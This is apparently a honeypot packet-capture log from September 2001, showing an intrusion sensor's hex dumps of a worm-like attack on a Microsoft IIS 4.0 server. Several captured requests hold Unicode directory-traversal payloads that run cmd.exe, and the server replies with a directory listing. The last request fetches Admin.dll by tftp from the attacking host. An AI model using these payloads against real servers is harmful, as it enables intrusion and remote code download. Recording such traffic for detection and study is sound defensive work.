Payload: none ---------------------------------------------------------------------------- -- #(2 - 25790) [2001-09-18 10:22:53] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=117 ID=52145 flags=0 offset=0 TTL=119 chksum=34460 TCP: port=2621 -> dport: 80 flags=***AP*** seq=488451083 ack=625400 off=5 res=0 win=8760 urp=0 chksum=59769 Payload: length = 71 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 41 64 6D 69 6E 2E 64 6C 6C 20 64 6C 6C 20 ./Admin.dll dll 020 : 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 HTTP/1.0..Host: 030 : 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E www..Connnection 040 : 3A 20 63 6C 6F 73 65 : close ---------------------------------------------------------------------------- -- #(2 - 25792) [2001-09-18 10:22:53] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=318 ID=33290 flags=0 offset=0 TTL=128 chksum=50810 TCP: port=80 -> dport: 2621 flags=***AP*** seq=625400 ack=488451160 off=5 res=0 win=8683 urp=0 chksum=60274 Payload: length = 278 000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72 HTTP/1.1 500 Ser 010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65 ver Error..Serve 020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53 r: Microsoft-IIS 030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C /4.0..Date: Tue, 040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A 18 Sep 2001 16: 050 : 30 36 3A 33 34 20 47 4D 54 0D 0A 43 6F 6E 74 65 06:34 GMT..Conte 060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 nt-Type: text/ht 070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 ml..Content-Leng 080 : 74 68 3A 20 31 33 39 0D 0A 0D 0A 3C 68 74 6D 6C th: 139....<html 090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72 ><head><title>Er 0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 ror</title></hea 0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 70 72 6F 63 d><body>The proc 0c0 : 65 73 73 20 63 61 6E 6E 6F 74 20 61 63 63 65 73 ess cannot acces 0d0 : 73 20 74 68 65 20 66 69 6C 65 20 62 65 63 61 75 s the file becau 0e0 : 73 65 20 69 74 20 69 73 20 62 65 69 6E 67 20 75 se it is being u 0f0 : 73 65 64 20 62 79 20 61 6E 6F 74 68 65 72 20 70 sed by another p 100 : 72 6F 63 65 73 73 2E 20 3C 2F 62 6F 64 79 3E 3C rocess. </body>< 110 : 2F 68 74 6D 6C 3E /html> ---------------------------------------------------------------------------- -- #(2 - 25793) [2001-09-18 10:22:53] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=33546 flags=0 offset=0 TTL=128 chksum=50832 TCP: port=80 -> dport: 2621 flags=***A***F seq=625678 ack=488451160 off=5 res=0 win=8683 urp=0 chksum=64665 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25800) [2001-09-18 10:22:53] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=36786 flags=0 offset=0 TTL=118 chksum=50152 TCP: port=2621 -> dport: 80 flags=*****R** seq=488451160 ack=0 off=5 res=0 win=0 urp=0 chksum=43689 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25801) [2001-09-18 10:22:53] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=44 ID=37042 flags=0 offset=0 TTL=118 chksum=49892 TCP: port=2999 -> dport: 80 flags=******S* seq=490886960 ack=0 off=6 res=0 win=8192 urp=0 chksum=18040 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25802) [2001-09-18 10:22:53] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=36362 flags=0 offset=0 TTL=128 chksum=48012 TCP: port=80 -> dport: 2999 flags=***A**S* seq=626480 ack=490886961 off=6 res=0 win=8760 urp=0 chksum=46325 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25803) [2001-09-18 10:22:53] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=37298 flags=0 offset=0 TTL=118 chksum=489 TCP: port=2621 -> dport: 80 flags=*****R** seq=488451160 ack=488451160 off=5 res=0 win=0 urp=0 chksum=24884 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25808) [2001-09-18 10:22:54] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=47026 flags=0 offset=0 TTL=119 chksum=39656 TCP: port=2999 -> dport: 80 flags=***A**** seq=490886961 ack=626481 off=5 res=0 win=8760 urp=0 chksum=52402 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25809) [2001-09-18 10:22:54] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=138 ID=47282 flags=0 offset=0 TTL=119 chksum=39302 TCP: port=2999 -> dport: 80 flags=***AP*** seq=490886961 ack=626481 off=5 res=0 win=8760 urp=0 chksum=23251 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D ir dir HTTP/1.0. 040 : 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E .Host: www..Conn 050 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 nection: close ---------------------------------------------------------------------------- -- #(2 - 25810) [2001-09-18 10:22:54] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=644 ID=38154 flags=0 offset=0 TTL=128 chksum=45620 TCP: port=80 -> dport: 2999 flags=***AP*** seq=626481 ack=490887059 off=5 res=0 win=8662 urp=0 chksum=33774 Payload: length = 604 000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A HTTP/1.1 404 Obj 010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53 ect Not Found..S 020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 erver: Microsoft 030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 -IIS/4.0..Date: 040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31 Tue, 18 Sep 2001 050 : 20 31 36 3A 30 36 3A 33 34 20 47 4D 54 0D 0A 43 16:06:34 GMT..C 060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4 070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 61..Content-Type 080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C : text/html....< 090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C html><head><titl 0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74 e>Error 404</tit 0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D le>....<meta nam 0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65 e="robots" conte 0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C nt="noindex">..< 0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D META HTTP-EQUIV= 0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43 "Content-Type" C 100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D ONTENT="text/htm 110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38 l; charset=iso-8 120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A 859-1"></head>.. 130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E ..<body>....<h2> 140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F HTTP Error 404</ 150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E h2>....<p><stron 160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C g>404 Not Found< 170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A /strong></p>.... 180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65 <p>The Web serve 190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68 r cannot find th 1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74 e file or script 1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20 you asked for. 1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65 Please check the 1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74 URL to ensure t 1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20 hat the path is 1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A correct.</p>.... 200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63 <p>Please contac 210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61 t the server's a 220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20 dministrator if 230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72 this problem per 240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F sists.</p>....</ 250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E body></html> ---------------------------------------------------------------------------- -- #(2 - 25811) [2001-09-18 10:22:54] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=38410 flags=0 offset=0 TTL=128 chksum=45968 TCP: port=80 -> dport: 2999 flags=***A***F seq=627085 ack=490887059 off=5 res=0 win=8662 urp=0 chksum=51797 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25820) [2001-09-18 10:22:54] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=60850 flags=0 offset=0 TTL=118 chksum=26088 TCP: port=2999 -> dport: 80 flags=*****R** seq=490887059 ack=0 off=5 res=0 win=0 urp=0 chksum=32207 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25821) [2001-09-18 10:22:54] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=44 ID=61106 flags=0 offset=0 TTL=118 chksum=25828 TCP: port=3040 -> dport: 80 flags=******S* seq=490887428 ack=0 off=6 res=0 win=8192 urp=0 chksum=17531 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25822) [2001-09-18 10:22:54] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=41482 flags=0 offset=0 TTL=128 chksum=42892 TCP: port=80 -> dport: 3040 flags=***A**S* seq=627281 ack=490887429 off=6 res=0 win=8760 urp=0 chksum=45015 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25823) [2001-09-18 10:22:54] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=61362 flags=0 offset=0 TTL=118 chksum=41960 TCP: port=2999 -> dport: 80 flags=*****R** seq=490887059 ack=490887059 off=5 res=0 win=0 urp=0 chksum=2298 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25860) [2001-09-18 10:22:57] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=51978 flags=0 offset=0 TTL=128 chksum=32396 TCP: port=80 -> dport: 3040 flags=***A**S* seq=627281 ack=490887429 off=6 res=0 win=8760 urp=0 chksum=45015 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25861) [2001-09-18 10:22:58] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=34741 flags=0 offset=0 TTL=119 chksum=51941 TCP: port=3040 -> dport: 80 flags=***A**** seq=490887525 ack=627282 off=5 res=0 win=8760 urp=0 chksum=50996 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25864) [2001-09-18 10:23:03] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=136 ID=27322 flags=0 offset=0 TTL=119 chksum=59264 TCP: port=3040 -> dport: 80 flags=***AP*** seq=490887429 ack=627282 off=5 res=0 win=8760 urp=0 chksum=35756 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H 040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne 050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close.. ---------------------------------------------------------------------------- -- #(2 - 25865) [2001-09-18 10:23:03] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=644 ID=60938 flags=0 offset=0 TTL=128 chksum=22836 TCP: port=80 -> dport: 3040 flags=***AP*** seq=627282 ack=490887525 off=5 res=0 win=8664 urp=0 chksum=32463 Payload: length = 604 000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A HTTP/1.1 404 Obj 010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53 ect Not Found..S 020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 erver: Microsoft 030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 -IIS/4.0..Date: 040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31 Tue, 18 Sep 2001 050 : 20 31 36 3A 30 36 3A 34 34 20 47 4D 54 0D 0A 43 16:06:44 GMT..C 060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4 070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 61..Content-Type 080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C : text/html....< 090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C html><head><titl 0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74 e>Error 404</tit 0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D le>....<meta nam 0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65 e="robots" conte 0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C nt="noindex">..< 0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D META HTTP-EQUIV= 0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43 "Content-Type" C 100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D ONTENT="text/htm 110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38 l; charset=iso-8 120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A 859-1"></head>.. 130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E ..<body>....<h2> 140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F HTTP Error 404</ 150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E h2>....<p><stron 160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C g>404 Not Found< 170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A /strong></p>.... 180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65 <p>The Web serve 190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68 r cannot find th 1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74 e file or script 1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20 you asked for. 1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65 Please check the 1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74 URL to ensure t 1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20 hat the path is 1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A correct.</p>.... 200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63 <p>Please contac 210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61 t the server's a 220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20 dministrator if 230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72 this problem per 240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F sists.</p>....</ 250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E body></html> ---------------------------------------------------------------------------- -- #(2 - 25866) [2001-09-18 10:23:03] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=61194 flags=0 offset=0 TTL=128 chksum=23184 TCP: port=80 -> dport: 3040 flags=***A***F seq=627886 ack=490887525 off=5 res=0 win=8664 urp=0 chksum=50487 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25867) [2001-09-18 10:23:04] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=37306 flags=0 offset=0 TTL=118 chksum=49632 TCP: port=3040 -> dport: 80 flags=*****R** seq=490887525 ack=0 off=5 res=0 win=0 urp=0 chksum=31700 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25868) [2001-09-18 10:23:04] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=44 ID=37562 flags=0 offset=0 TTL=118 chksum=49372 TCP: port=3922 -> dport: 80 flags=******S* seq=491792565 ack=0 off=6 res=0 win=8192 urp=0 chksum=29002 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25869) [2001-09-18 10:23:04] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=62218 flags=0 offset=0 TTL=128 chksum=22156 TCP: port=80 -> dport: 3922 flags=***A**S* seq=636895 ack=491792566 off=6 res=0 win=8760 urp=0 chksum=46872 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25870) [2001-09-18 10:23:04] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=37818 flags=0 offset=0 TTL=118 chksum=65504 TCP: port=3040 -> dport: 80 flags=*****R** seq=490887525 ack=490887525 off=5 res=0 win=0 urp=0 chksum=1325 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25871) [2001-09-18 10:23:04] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=51386 flags=0 offset=0 TTL=119 chksum=35296 TCP: port=3922 -> dport: 80 flags=***A**** seq=491792566 ack=636896 off=5 res=0 win=8760 urp=0 chksum=52949 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25872) [2001-09-18 10:23:04] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=140 ID=51642 flags=0 offset=0 TTL=119 chksum=34940 TCP: port=3922 -> dport: 80 flags=***AP*** seq=491792566 ack=636896 off=5 res=0 win=8760 urp=0 chksum=10943 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E ir c+dir HTTP/1. 040 : 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 0..Host: www..Co 050 : 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F nnnection: clo ---------------------------------------------------------------------------- -- #(2 - 25873) [2001-09-18 10:23:04] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=231 ID=63242 flags=0 offset=0 TTL=128 chksum=20945 TCP: port=80 -> dport: 3922 flags=***AP*** seq=636896 ack=491792666 off=5 res=0 win=8660 urp=0 chksum=31770 Payload: length = 191 000 : 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK. 010 : 0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F .Server: Microso 020 : 66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 ft-IIS/4.0..Date 030 : 3A 20 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 : Tue, 18 Sep 20 040 : 30 31 20 31 36 3A 30 36 3A 34 35 20 47 4D 54 0D 01 16:06:45 GMT. 050 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 .Content-Type: a 060 : 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74 pplication/octet 070 : 2D 73 74 72 65 61 6D 0D 0A 56 6F 6C 75 6D 65 20 -stream..Volume 080 : 69 6E 20 64 72 69 76 65 20 43 20 68 61 73 20 6E in drive C has n 090 : 6F 20 6C 61 62 65 6C 2E 0D 0A 56 6F 6C 75 6D 65 o label...Volume 0a0 : 20 53 65 72 69 61 6C 20 4E 75 6D 62 65 72 20 69 Serial Number i 0b0 : 73 20 38 30 42 34 2D 38 39 43 41 0D 0A 0D 0A s 80B4-89CA.... ---------------------------------------------------------------------------- -- #(2 - 25874) [2001-09-18 10:23:04] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=451 ID=63498 flags=0 offset=0 TTL=128 chksum=20469 TCP: port=80 -> dport: 3922 flags=***AP**F seq=637087 ack=491792666 off=5 res=0 win=8660 urp=0 chksum=27215 Payload: length = 411 000 : 20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 43 3A Directory of C: 010 : 5C 49 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \Inetpub\scripts 020 : 0D 0A 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 31 ....09/18/01 11 030 : 3A 30 35 61 20 20 20 20 20 20 20 20 3C 44 49 52 :05a <DIR 040 : 3E 20 20 20 20 20 20 20 20 20 20 2E 0D 0A 30 39 > ...09 050 : 2F 31 38 2F 30 31 20 20 31 31 3A 30 35 61 20 20 /18/01 11:05a 060 : 20 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20 <DIR> 070 : 20 20 20 20 20 2E 2E 0D 0A 30 39 2F 31 38 2F 30 ....09/18/0 080 : 31 20 20 31 31 3A 30 36 61 20 20 20 20 20 20 20 1 11:06a 090 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20 57,344 0a0 : 54 46 54 50 32 30 31 0D 0A 30 39 2F 31 38 2F 30 TFTP201..09/18/0 0b0 : 31 20 20 31 31 3A 30 34 61 20 20 20 20 20 20 20 1 11:04a 0c0 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20 57,344 0d0 : 54 46 54 50 32 30 36 0D 0A 30 39 2F 31 38 2F 30 TFTP206..09/18/0 0e0 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20 1 11:05a 0f0 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20 57,344 100 : 54 46 54 50 32 32 32 0D 0A 30 39 2F 31 38 2F 30 TFTP222..09/18/0 110 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20 1 11:05a 120 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20 57,344 130 : 54 46 54 50 38 34 0D 0A 20 20 20 20 20 20 20 20 TFTP84.. 140 : 20 20 20 20 20 20 20 36 20 46 69 6C 65 28 73 29 6 File(s) 150 : 20 20 20 20 20 20 20 20 32 32 39 2C 33 37 36 20 229,376 160 : 62 79 74 65 73 0D 0A 20 20 20 20 20 20 20 20 20 bytes.. 170 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 180 : 20 32 2C 31 30 30 2C 31 36 39 2C 32 31 36 20 62 2,100,169,216 b 190 : 79 74 65 73 20 66 72 65 65 0D 0A ytes free.. ---------------------------------------------------------------------------- -- #(2 - 25875) [2001-09-18 10:23:05] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=5563 flags=0 offset=0 TTL=118 chksum=15840 TCP: port=3922 -> dport: 80 flags=*****R** seq=491792666 ack=0 off=5 res=0 win=0 urp=0 chksum=43167 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25876) [2001-09-18 10:23:05] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=44 ID=5819 flags=0 offset=0 TTL=118 chksum=15580 TCP: port=3995 -> dport: 80 flags=******S* seq=491921308 ack=0 off=6 res=0 win=8192 urp=0 chksum=31256 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25877) [2001-09-18 10:23:05] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=65034 flags=0 offset=0 TTL=128 chksum=19340 TCP: port=80 -> dport: 3995 flags=***A**S* seq=637867 ack=491921309 off=6 res=0 win=8760 urp=0 chksum=48154 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25878) [2001-09-18 10:23:05] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=6331 flags=0 offset=0 TTL=118 chksum=31456 TCP: port=3922 -> dport: 80 flags=*****R** seq=491792666 ack=491792666 off=5 res=0 win=0 urp=0 chksum=25141 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25883) [2001-09-18 10:23:05] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=10684 flags=0 offset=0 TTL=119 chksum=10463 TCP: port=3995 -> dport: 80 flags=***A**** seq=491921309 ack=637868 off=5 res=0 win=8760 urp=0 chksum=54231 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25884) [2001-09-18 10:23:05] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=195 ID=10940 flags=0 offset=0 TTL=119 chksum=10052 TCP: port=3995 -> dport: 80 flags=***AP*** seq=491921309 ack=637868 off=5 res=0 win=8760 urp=0 chksum=37455 Payload: length = 139 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 m32/cmd.exe?/c+t 030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 ftp -i 65.29.243 040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 .180 GET Admin.d 050 : 6C 6C 20 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 ll c:\Admin.dll 060 : 25 32 30 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 %20c:\Admin.dll 070 : 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 HTTP/1.0..Host: 080 : 77 77 77 0D 0A 43 6F 6E 6E 6E 65 www..Connne ---------------------------------------------------------------------------- -- #(2 - 25886) [2001-09-18 10:23:05] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=395 ID=779 flags=0 offset=0 TTL=128 chksum=17709 TCP: port=80 -> dport: 3995 flags=***AP*** seq=637868 ack=491921464 off=5 res=0 win=8605 urp=0 chksum=26262 